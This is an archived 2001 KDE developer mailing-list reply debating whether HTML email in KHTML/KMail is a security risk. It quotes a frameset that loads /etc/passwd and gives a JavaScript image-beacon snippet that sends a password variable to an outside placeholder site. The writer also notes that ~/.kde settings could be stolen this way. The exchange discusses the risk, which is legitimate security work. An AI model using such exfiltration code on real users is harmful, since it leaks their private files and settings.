[prev in list] [next in list] [prev in thread] [next in thread]
List: kfm-devel
Subject: Re: Possible security problem in KHTML or KMail?
From: Vadim Plessky <lucy-ples () mtu-net ! ru>
Date: 2001-10-11 13:59:54
[Download RAW message or body]
On Thursday 11 October 2001 11:58, Rob Kaper wrote:
| On Wed, Oct 10, 2001 at 09:14:59PM +0200, Ingo Klöcker wrote:
| > <html><head></head><frameset><frame src="/etc/passwd"></frameset>
| > <body></body></html>
|
| This is by no means a security risk. Local users have always been able to
| read/display the /etc/passwd file.
That's right.
But what if some JavaScript code parsed this /etc/passwd and sent to another
web site?
let's assume password (or other private info) is already in "mypasw"
variable.
This fragment of JS:
<script language="JavaScript"><!--
d=document;
d.write('<img src="http://your.web.page.com/counter'+
'?id=111;t=81;pas='+mypasw+';rand='+Math.random()+
'" alt="ha ha" '+ 'border=0 height=31 width=38>')</script>
-->
</script >
will effectivly send "mypasw" to http://your.web.page.com/ site (you need
just to track incoming requests on server, and parse them and store later in
database)
Frankly speaking, I am not Linux security expert, and don't know how
confidential information in /etc/passwd is.
It just has some user names, but no passwords.
Of course, in this manner you can steal all KDE settings (from ~/.kde), but I
don't know if it is some kind of risk at all.
P.S. I agree with Ingo Klöcker "The only security problem is allowing
HTML messages to be rendered at all.". If you disabled JavaScript, and do not
render HTML at all - you should feel yourself secure.
--
Vadim Plessky
http://kde2.newmail.ru (English)
33 Window Decorations and 6 Widget Styles for KDE
http://kde2.newmail.ru/kde_themes.html
KDE mini-Themes
http://kde2.newmail.ru/themes/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic